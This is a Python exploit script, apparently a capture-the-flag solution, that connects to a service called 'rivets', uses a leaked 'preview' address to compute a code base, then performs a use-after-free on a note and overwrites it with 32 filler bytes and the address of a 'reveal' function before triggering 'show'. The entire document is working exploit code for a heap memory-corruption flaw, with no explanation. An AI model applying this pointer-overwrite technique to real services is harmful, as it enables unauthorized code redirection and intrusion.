import socket
import struct
import sys

p64 = lambda x: struct.pack("<Q", x & 0xffffffffffffffff)
u64 = lambda x: struct.unpack("<Q", x)[0]


def until(sock, marker):
    data = bytearray()
    while not data.endswith(marker):
        chunk = sock.recv(1)
        if not chunk:
            raise ConnectionError("rivets closed the connection")
        data.extend(chunk)
    return bytes(data)


def command(sock, text):
    until(sock, b"> ")
    sock.sendall(text + b"\n")
    return until(sock, b"\n").strip()


def main():
    host, port = sys.argv[1], int(sys.argv[2])
    with socket.create_connection((host, port), timeout=3) as sock:
        banner = until(sock, b"\n").strip()
        if not banner.startswith(b"preview: "):
            raise ValueError(banner)
        preview = int(banner.split()[-1], 16)
        base = preview - 0x1350
        reveal = base + 0x1240
        print("preview", hex(preview), "reveal", hex(reveal))
        print(command(sock, b"new 0"))
        print(command(sock, b"drop 0"))
        print(command(sock, b"replace 0 " + b"C" * 32 + p64(reveal).hex().encode()))
        print(command(sock, b"show 0").decode(errors="replace"))


if __name__ == "__main__":
    if len(sys.argv) != 3:
        raise SystemExit("usage: python3 rivets.py HOST PORT")
    main()
